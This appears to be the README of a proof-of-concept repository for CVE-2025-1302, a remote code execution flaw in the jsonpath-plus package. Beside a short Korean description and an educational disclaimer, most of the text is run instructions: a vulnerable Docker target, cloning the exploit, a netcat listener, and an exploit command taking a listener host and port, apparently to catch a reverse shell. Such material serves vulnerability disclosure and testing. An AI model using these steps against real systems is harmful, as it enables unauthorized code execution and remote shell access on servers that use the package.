
JSONPath-plus Remote Code Execution
★ CVE-2025-1302 JSONPath-plus RCE PoC ★
https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0
localhost:3000

jsonpath-plus 패키지 10.3.0 미만 버전은 부적절한 입력 검증으로 인해 원격 코드 실행(RCE) 취약점이 있습니다. 공격자는 eval='safe' 모드의 안전하지 않은 기본 사용을 악용하여 시스템에서 임의의 코드를 실행할 수 있습니다. 참고: 이는 CVE-2024-21534에 대한 불완전한 수정으로 인해 발생합니다.
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302
pip install -r requirements.txt
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>


이 저장소는 CVE-2025-1302에 대한 RCE 익스플로잇으로 사용되기 위한 것이 아닙니다. 이 프로젝트의 목적은 사람들이 이 취약점에 대해 배우고, 자신의 애플리케이션을 테스트하는 데 도움을 주기 위함입니다.
매월 CVE 및 악성코드 분석을 게시합니다. 관심이 있으시면 아래 링크를 따라가서 발행물을 확인해 주세요. https://www.skshieldus.com/eng/business/insight.do